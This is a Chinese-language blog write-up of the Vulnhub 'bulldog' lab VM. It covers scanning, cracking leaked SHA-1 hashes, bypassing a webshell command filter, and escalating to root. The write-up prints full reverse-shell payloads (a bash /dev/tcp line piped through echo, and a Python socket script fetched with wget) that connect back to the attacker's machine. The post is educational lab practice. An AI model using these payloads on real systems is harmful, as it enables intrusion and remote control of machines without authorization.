[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell（三）

时间 2020-05-14 标签网络安全自学篇七十五 75 vulnhub 靶机渗透 bulldog 信息收集 nc 反弹 shell 三

这是做者网络安全自学教程系列，主要是关于安全工具和实践操做的在线笔记，特分享出来与博友们学习，但愿您喜欢，一块儿进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例，并介绍防护措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog，包括信息收集及目录扫描、源码解读及系统登录、命令注入和shell反弹、权限提高和获取flag。本文是一篇Web渗透的基础性文章，但愿对您有所帮助。php

做者做为网络安全的小白，分享一些自学基础教程给你们，主要是关于安全工具和实践操做的在线笔记，但愿您们喜欢。同时，更但愿您能与我一块儿操做和进步，后续将深刻学习网络安全和系统安全知识并分享相关实验。总之，但愿该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！若是文章对您有帮助，将是我创做的最大动力，点赞、评论、私聊都可，一块儿加油喔~html

文章目录

一.bulldog题目描述及环境配置

二.bulldog靶机渗透详解

三.总结

PS：本文参考了github、安全网站和参考文献中的文章（详见参考文献），并结合本身的经验和实践进行撰写，也推荐你们阅读参考文献。前端

做者的github资源：
软件安全：https://github.com/eastmountyxz/Software-Security-Course
其余工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
Wannacry分析：https://github.com/eastmountyxz/WannaCry-Experimentpython

声明：本人坚定反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络须要咱们共同维护，更推荐你们了解它们背后的原理，更好地进行防御。git

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
 [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
 [渗透&攻防] 三.数据库之差别备份及Caidao利器
 [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包web

一.bulldog题目描述及环境配置

Vulnhub是一个特别好的渗透测试实战靶场，提供了许多带有漏洞的渗透测试虚拟机下载。做者会深刻分析20多个案例来熟悉各类Web渗透工具及方法，但愿能帮助到您。正则表达式

1.题目描述

靶场题目： bulldog
靶场地址：https://www.vulnhub.com/entry/bulldog-1%2C211/
难度描述：初学者/中级，目标是进入根目录并查看祝贺消息，提权到root权限查看flag
靶场做者：Nick Frichette
下载地址：
https://download.vulnhub.com/bulldog/
https://download.vulnhub.com/bulldog/bulldog.ova

Description
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don’t you find out? This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!

Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That’s my only hint
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n

I’d highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn’t have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
算法

2.环境搭建

第一步，下载资源shell

第二步，打开VMware虚拟机安装靶场
找到咱们刚才下载的文件，导入虚拟机。

选择存放的位置，而后点击导入。若是出现未经过OVF规范一致性或虚拟硬件合规性检查，请单击“重试”导入。

第三步，导入完成以后，设置NAT网络模式
注意，咱们须要将靶机和kali放在同一个局域网下，保证能通讯。

第四步，点击开启虚拟机

此时服务器处于开启状态，开始Kali操做吧！最先我一直去找用户名和密码尝试登陆，后来想这个靶场应该是让你经过其余系统来渗透的。哈哈，毕竟我也是初学者，遇到任何简单问题都理解。

第五步，设置虚拟机网络
到开机页面选择第二个Ubuntu的高级选项，若是启动网络正常的话能够直接开机，若是网络不正常能够按下面步骤操做。进入高级选项，再次选择第二个Linux内核版本的恢复模式回车。

回车后会弹出选择界面，咱们选择root一行回车，接着再次回车进入命令行模式。

输入“mount -o rw,remount / ”命令，再配置网络问卷，不然后面可能没法保存网络配置文件，这个命令让咱们的 / 路径文件系统的可读模式能自由修改。接着输入命令查看网卡。

mount -o rw,remount /
ifconfig -a

做者的是ens33，而后继续输入命令修改网络配置文件。输入I修改模式，以下图所示。

vi /etc/network/interfaces

修改这两个地方，改为你的网卡名称，而后输入“:wq”保存。

最后输入reboot重启便可。

二.bulldog靶机渗透详解

1.信息收集及目录扫描

首先是信息收集一波，任何网站或Web都须要进行一波扫描和分析。

第一步，目标主机IP探测
首先须要探测目标靶场的IP，推荐三种方法。

方法1：使用arp-scan命令探测目标的IP地址

arp-scan -l
目标IP为192.168.44.153

方法2：使用nmap识别目标主机

nmap -sP 192.168.44.0/24

方法3：使用netdiscover识别目标主机

netdiscover -r 192.168.44.0/24 -i eth0
做者结合本身的虚拟机识别出来IP地址为：192.168.44.153

第二步，端口扫描
nmap命令的基本用法以下：

-sS：半开扫描，记入系统日志风险小
-sP：扫描端口前，先使用ping扫描，保证主机存活
-A：全面系统检测，启用脚本检测和扫描

输入命令以下：

nmap -sS -T4 -A -p- 192.168.44.153

扫描结果（主机开放端口）以下，经常使用的端口2三、88和8080，发现SSH服务和Web服务，而且Web服务为python。23端口是 telnet 的默认端口，80端口和8080端口常常被用做提供web服务。

23：SSH远程链接
80：HTTP网站协议
8080：HTTP网站协议

接着咱们能够借助nc及其余工具对每一个端口进行分析。

nc -nv 192.168.44.153 23

这里显示23是一个远程端口，运行着openssh服务。接着尝试在终端中输入“ssh -v test@192.168.44.153 -p 23”测试。

接着测试80端口和8080端口，运行结果以下：

nc -nv 192.168.44.153 80
nc -nv 192.168.44.153 8080

接下来使用搜索引擎搜索“WSGIServer/0.1 Python /2.7.12“，结果显示这是一个Django Web服务器。

第三步，目录扫描
在信息扫描中，目录扫描是接下来的操做，利用dirb扫描80端口的目录文件，敏感文件分析很是重要。

dirb http://192.168.44.153

使用dirb扫描到两个目录，可是没有任何有用信息。

DIRECTORY: http://192.168.44.153/admin/
DIRECTORY: http://192.168.44.153/dev/
DIRECTORY: http://192.168.44.153/admin/auth/
DIRECTORY: http://192.168.44.153/admin/login/
DIRECTORY: http://192.168.44.153/admin/logout/
DIRECTORY: http://192.168.44.153/dev/shell/

2.源码解读及系统登录

第一步，敏感文件分析
尝试用浏览器访问网址，网页中包含了一张bulldog图片和文字。

http://192.168.44.153

查看源代码发现是POST提交请求，没有价值信息。

http://192.168.44.153/admin

打开admin尝试人工注入失败，也能够用Burp注入测试下。

http://192.168.44.153/admin/login/?next=/admin/

从扫描结果中，咱们获得一个颇有意思的web目录 /dev/ ，浏览器中访问。

http://192.168.44.153/dev/

浏览一下，发现/dev/页面的信息比较多，简单翻译以下。大概意思移除了PHP、phpmyadmin和CMS系统，新的系统是用Django编写而且启用了SSH。

查看/dev/shell发现Webshell不能使用，须要经过服务器进行身份验证才能使用Webshell。一般Webshell是能为咱们所用的，但如今提示与服务器进行身份验证才能使用Webshell，那接着看看源代码（以前dirb扫描出该目录）。

http://192.168.44.153/dev/shell/

第二步，查看网页源代码并分析

查看 /dev/ 源代码，能够看到邮箱和一些hash值。

Team Lead: alan@bulldogindustries.com – 6515229daf8dbdc8b89fed2e60f107433da5f2cb –
Back-up Team Lead: william@bulldogindustries.com – 38882f3b81f8f2bc47d9f3119155b05f954892fb –
Front End: malik@bulldogindustries.com – c6f7e34d5d08ba4a40dd5627508ccb55b425e279 –
Front End: kevin@bulldogindustries.com – 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 –
Back End: ashley@bulldogindustries.com – 553d917a396414ab99785694afd51df3a8a8a3e0 –
Back End: nick@bulldogindustries.com – ddf45997a7e18a25ad5f5cf222da64814dd060d5 –
Database: sarah@bulldogindustries.com – d8b8dd5e7f000b8dea26ef8428caf38c04466b3e –

方法一：在线网站爆破
每一个邮箱后都有一个哈希值，这极可能是password，接着对每一个md5进行在线解密。

https://cmd5.com/
https://www.somd5.com/

解密出最后两条信息：

bulldog ( Back End nick@bulldogindustries.com )
bulldoglover ( Database sarah@bulldogindustries.com )

方法二：经过hash-identifier工具和John
爆破它们，就须要知道是哪一种算法生成的这些值，咱们借助一个开源的工具“hash-identifier”来识别哪一种hash。

hash-identifier

其结果是SHA-1哈希，接下来使用John-The-Ripper进行解密便可。
参考文章：https://scriptboy.cn/p/writeup-bulldog/

接下来，咱们使用用户名 nick@bulldogindustries.com 和 sarah@bulldogindustries.com 以及对应的密码 bulldog 和 bulldoglover 登录，却失败了结。接着大胆猜想，用户名为 nick 和 sarah ，密码分别对应 bulldog 和 bulldoglover。

用户名：nick，密码：bulldog
用户名：sarah，密码：bulldoglover

成功登陆系统，但提示没有对应的权限。

3.命令注入和shell反弹

第一步，访问Webshell的基本命令
尝试访问http://192.168.44.153/dev/shell，成功获得Webshell，此时可以提交6个命令。

这里给咱们6个可用的命令，以下图所示，好比输入“ifconfig”查看网络。

但执行其余的命令会被拦截，由于该网站加了过滤，一些敏感命令没办法使用。

第二步，使用Linux的 & 和 | 进行命令组合绕过

ifconfig&&ls
ifconfig & whoami

咱们须要想办法绕过防火墙取得最终权限，通过一番琢磨，用echo命令打包能够实现绕过，例如：echo whoami|sh。

第三步，nc监听端口并反弹shell
本地执行nc -lvp 4444监听本地端口4444，而后在Web-shell上执行反弹脚本。

nc -lvp 4444

接着尝试bash反弹，在靶机打开的网页命令框中输入命令，但结果提示错误。

bash -i >& /dev/tcp/192.168.44.138/4444 0>&1

因为echo命令是容许执行的，因此利用echo构建一个反弹shell的命令，而后用管道符给bash执行。

ls &&echo “bash -i >& /dev/tcp/192.168.44.138/4444 0>&1” | bash
echo “bash -i >& /dev/tcp/192.168.44.138/4444 0>&1” | bash
IP地址为Kali攻击机地址

在web页面执行echo ‘bash -i >& /dev/tcp/192.168.44.138/4444 0>&1’|bash，就能够弹回一个shell。注意，这里的IP地址是Kali系统的，不然会提示“500错误”。

此时的nc处于正常监听状态，而且成功反弹shell。

同时，补充另外一种方法。经过Kali搭建一个简易Web服务，反弹shell的脚本要写到相应的目录，不然靶机用wget下载的时候就会访问失败。

import socket,subprocess,os 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.44.138", 4444))  #Kali系统IP地址 4444是nc的监听端口
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

若是服务器搭建在/var/www/html文件时，须要把脚本写到/var/www/html。

输入下面监听Python网站。

python -m SimpleHTTPServer 80

靶机用weget命令上传Python文件，并反弹shell。

pwd&wget http://192.168.44.153/bulldog-webshell.py
反弹成功输入python -c ‘import pty;pty.spawn("/bin/bash")’

至此，咱们获得了django的普通权限，下一步就是想办法提权，这就须要不断地去探索发现整个系统的漏洞。

4.权限提高和获取flag

nc反弹shell以后，咱们可使用命令进行一系列的查看。

切换目录到 bulldogadmin，并查看所有文件，包括隐藏文件。

cd bulldogadmin
ls -al

这里发现一个.hiddenadmindirectory 文件，进入隐藏管理员目录查看。看到customPermissionApp，它应该是分配权限的一个程序，但咱们没有权限打开。接着怎么办呢？虽然不能执行，可是尝试查看文件的内容和字符串。

cd .hiddenadmindirectory
ls -al

利用string查看可执行文件中的字符。

strings customPerssionApp

从以上字符猜想该程序的用途，推测其是密码。经过下列四个字符拼接，注意每一段后面的H不是密码须要去除。

SUPERultH
imatePASH
SWORDyouH
CANTget

密码：SUPERultimatePASSWORDyouCANTget

接着想办法用上面的密码提高django或者bulldogadmin权限，咱们想经过sudo su - root拿到root，但提示“su must be run from a terminal”。

这里补充一个技巧，能够用Python调用本地的shell实现，命令以下：

python -c 'import pty; pty.spawn("/bin/bash")'

而后执行命令 sudo su -，输入刚才记下来的密码，成功从django权限提高到root权限，最终成功得到root权限并拿到flag。

sudo su -
密码：SUPERultimatePASSWORDyouCANTget

输入ls命令，发现里面只有一个文本文档，再输入 cat congrats.txt 查看文件，最后读取flag文件。

三.总结

写道这里，这篇文章讲解完毕，后续会更深刻的分享。bulldog的渗透流程以下：

信息收集
目标IP探测 (arp-scan、netdiscover、nmap)
Nmap端口扫描
目录扫描
用dirb扫出了许多关键目录（admin和dev页面）
敏感文件查找及网页访问
MD5破解（在线破解、hash-identifier）
仔细观察网页信息，该靶机主要在/dev目录处前端源码泄露了MD5密码信息
登陆管理员帐号，并在/dev/shell页面利用命令注入漏洞
命令注入和shell反弹
命令拼接（ls &&echo “bash -i >& /dev/tcp/192.168.44.138/4444 0>&1” | bash）
nc反弹shell（nc -lvp 4444）
Python搭建临时Web服务（python -m SimpleHTTPServer 80）
权限提高和获取flag
sudo python -c ‘import pty; pty.spawn("/bin/bash")’
sudo su - root

但愿这系列文章对您有所帮助，真的感受本身技术好菜，要学的知识好多。转眼5月份到来，这是第75篇原创的安全系列文章，从网络安全到系统安全，从木马病毒到后门劫持，从恶意代码到溯源分析，从渗透工具到二进制工具，还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防，人生漫漫其路远兮，做为初学者，本身真是爬着前行；同时学术论文得深刻了，加油！感谢不少人的帮助，继续爬着，继续加油！

欢迎你们讨论，是否以为这系列文章帮助到您！任何建议均可以评论告知读者，共勉。

(By:Eastmount 2020-05-12 晚上12点写于贵阳 http://blog.csdn.net/eastmount/)

参考文献：
[1] https://www.vulnhub.com/entry/bulldog-1%2C211/
[2] Bulldog: 1 – Vulnhub Writeup - vonhewitt
[3] Vulnhub靶场渗透练习(三) bulldog - feizianquan
[4] VulnHub靶机学习——BullDog实战记录 - 安全师官方
[5] WriteUp|CTF-bulldog - cnsimo
[6] Vulnhub bulldog靶机渗透 - A1oe
[7] VulnHub------bulldog - 大方子
[8] [VulnHub靶机渗透] 一：BullDog2 - 工科学生死板板